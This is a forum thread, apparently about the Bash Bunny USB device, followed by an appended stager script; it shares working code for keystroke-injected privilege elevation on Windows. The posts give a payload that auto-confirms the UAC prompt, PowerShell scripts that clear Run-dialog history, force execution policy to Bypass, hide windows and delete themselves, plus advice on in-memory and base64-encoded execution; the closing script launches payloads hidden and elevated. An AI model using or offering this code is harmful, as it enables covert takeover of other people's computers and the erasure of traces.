Dracstic
Posted September 23, 2019

Hello all,

I'm working on a project that requires multiple programs to run in parallel, and when started individually each one triggers a UAC window. After some tinkering I came to the following solution and wanted to pass it along. Hope it helps.

It starts with modifying the run.sh file in the extensions folder. I added the following code after the line `case "$os" in`. This isn't strictly needed, but I plan on using this in the future as well.

```bash
    WIN_UAC)
        QUACK GUI r                 # open the Run dialog
        QUACK DELAY 500
        QUACK STRING "$@"           # the command handed to RUN WIN_UAC
        QUACK CTRL-SHIFT ENTER      # Ctrl+Shift+Enter runs the command as administrator
        QUACK DELAY 1000
        QUACK ALT y                 # answer "Yes" on the UAC prompt
        QUACK ALT c                 # fallbacks for other UAC prompt layouts
        QUACK LEFTARROW
        QUACK ENTER
        QUACK ENTER
    ;;
```

I then created the BashBunny payload that would copy the file p2.ps1 from the switch# folder to the root of the USB storage and then call a quick PowerShell script using the new RUN WIN_UAC command that I just added.

```bash
######## INITIALIZATION ########
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
# stage p2.ps1 at the root of the exposed USB storage so p1.ps1 can find it
cp /root/udisk/payloads/$SWITCH_POSITION/p2.ps1 /root/udisk/p2.ps1

######## ATTACK ########
LED ATTACK
Q DELAY 1000
# locate the BashBunny volume by label and run p1.ps1 elevated via the Run dialog
RUN WIN_UAC "powerShell .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\p1.ps1')"

######## FINISH ########
LED FINISH
```

The RUN WIN_UAC command will run the PowerShell script p1.ps1 with administrator privileges. p1.ps1 will copy p2.ps1 from the root of the BashBunny storage to a temporary folder on the PC and then run p2.ps1 with admin privileges. At this time the BashBunny can be unplugged.

```powershell
#Setup
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue   # Clear the Run dialog history
Set-ExecutionPolicy Bypass -Force   # Relax the script execution policy (this does not change UAC; the process is already elevated). Without -Scope this persists machine-wide.

# Copy p2.ps1 from the BashBunny storage root to the temp folder on the PC, then run p2.ps1 from there.
# The path is quoted so a temp folder containing spaces still works.
Copy-Item ((gwmi win32_volume -f 'label=''BashBunny''').Name + 'p2.ps1') -Destination $env:temp
Start-Process powershell -ArgumentList ('-ExecutionPolicy Bypass -File "' + $env:temp + '\p2.ps1"')
```

p2.ps1 will run with admin privileges from the temporary folder, and when its job is complete it will delete itself and end the PowerShell process.

```powershell
#Setup
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue   # Clear the Run dialog history
Set-ExecutionPolicy Bypass -Force   # Relax the script execution policy (not UAC); redundant if p1.ps1 already did this

# Your payload here, with all the privileges.

Remove-Item $PSCommandPath   # Delete this script file (p2.ps1 in the temp folder)
Stop-Process -Id $PID        # End this process
#End
```

To add stealthiness I would add -WindowStyle Hidden to the Start-Process lines, as well as turn down the volume or mute before the UAC window is triggered. What do you think?

Drac.
PoSHMagiC0de
Posted September 23, 2019

You can create a stager to handle the download and execution of all your scripts under the same admin context without having to repeatedly launch a new process via quack commands. Staging is using one script or program to download and launch additional scripts. You would use ps1 to get a bypassed instance with your WIN_UAC function. Inside the ps1 you would have additional commands to start new processes for each script. Because ps1 was started elevated, anything it runs will run elevated too. So inside ps1 you could

```powershell
Start-Process Powershell -ArgumentList "<path to powershell script> <arguments for script>"
```

Also, I do not see the need to move the scripts around from their switch folder. If ps1 launched from the BB payload switch folder then ps2 can too.
Dracstic (Author)
Posted September 24, 2019

I'll keep that in mind. Running one script from the BashBunny would work great for quick jobs. Unfortunately the project I'm working on downloads and runs multiple executables and takes over an hour to complete. I know PowerShell scripts are copied to and run from memory, but I was having issues with reliability after the script was started and the BashBunny was unplugged. With the two-script setup I can unplug the BashBunny as soon as the first script closes.
PoSHMagiC0de
Posted September 24, 2019

Why would you have to wait? You can fire off each script in parallel too in the PowerShell script. Start-Process is non-blocking. In ps1 you would have two Start-Process calls for powershell, with the argument for the first script in the first one and the second script in the second one, or a third one for a third script also. Start-Process will fire them off one after another but will not wait for them to finish before firing off the others. It will only wait if you use Wait-Process. At the end of the ps1 file you can signal however you like to the Bunny that you are done so you can pull the Bash Bunny.

Running them in memory means firing off a "start-process powershell", but the argument will be a command to Get-Content and iex one of those scripts. Now your iex is in another PowerShell process and not holding up ps1. Remember: Start-Process is for when you want something run outside of your current process. Remember you can pass the job of grabbing and running that script to that process.

If you really feel like coding, you can grab the script, Unicode base64 encode it, and then run "start-process powershell" using "-E" for the argument with the base64-encoded script... if it is not bigger than 8.9k characters. I am rounding.
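Putting the staging approach from the two replies above into one script, here is an added example of a p1.ps1-style stager. It is not code from the thread or from the Bash Bunny project. It assumes the payload scripts have already been copied to a folder on the PC (`$StageDir`, a hypothetical location; the script names are whatever is in that folder) and that the stager itself was launched elevated through RUN WIN_UAC. Each payload is launched in its own PowerShell process with Start-Process, so the launches do not block each other; scripts small enough to fit on a command line are passed in memory with -EncodedCommand (UTF-16LE base64, which is what -E expects), and larger ones are run with -File from the staging copy. Using -ExecutionPolicy Bypass per process also avoids the machine-wide Set-ExecutionPolicy change in the posted scripts.

```powershell
# Added example, not from the thread: stager that launches every payload script in parallel
# from one elevated PowerShell process.
param(
    [string]$StageDir = (Join-Path $env:TEMP 'stage'),   # assumed folder holding the payload scripts
    [switch]$Wait                                        # optionally wait for the children before cleaning up
)

# Confirm this process is actually elevated. Children inherit the token, so everything
# started below runs as administrator without another UAC prompt.
$identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
$principal = New-Object Security.Principal.WindowsPrincipal($identity)
if (-not $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
    throw 'Stager is not elevated; launch it through RUN WIN_UAC (Ctrl+Shift+Enter) first.'
}

# cmd.exe caps a command line at 8191 characters (CreateProcess itself allows 32767).
# Stay under the smaller limit so the same launch line also works from the Run dialog.
$MaxEncoded = 8000

function Start-PayloadScript {
    param([string]$Path)
    $text    = Get-Content -Path $Path -Raw
    $encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($text))
    $common  = @('-NoProfile', '-ExecutionPolicy', 'Bypass')
    if ($encoded.Length -le $MaxEncoded) {
        # Script body travels inside the argument list: the child never reads it from disk.
        $args = $common + @('-EncodedCommand', $encoded)
    } else {
        # Too large to encode: run the staged copy, which survives unplugging the device.
        $args = $common + @('-File', "`"$Path`"")
    }
    # Start-Process returns at once; -PassThru hands back the Process object for later.
    Start-Process -FilePath 'powershell.exe' -ArgumentList $args -WindowStyle Hidden -PassThru
}

# Launch every *.ps1 in the staging folder; none of these calls waits for the previous one.
$children = Get-ChildItem -Path $StageDir -Filter '*.ps1' | ForEach-Object {
    Start-PayloadScript -Path $_.FullName
}
Write-Host ("Launched {0} payload process(es): {1}" -f $children.Count, ($children.Id -join ', '))

# Nothing below needs the USB storage any more; the device can be removed at this point.
if ($Wait) {
    $children | Wait-Process
    Remove-Item -Path $StageDir -Recurse -Force -ErrorAction SilentlyContinue
}
```

Run it as `powershell -ExecutionPolicy Bypass -File stager.ps1` from the elevated Run dialog, or add `-Wait` if the stager should outlive the payloads and remove the staging folder afterwards. How the "done" condition is relayed back to the Bash Bunny is left to the payload, as the thread does not settle on a method.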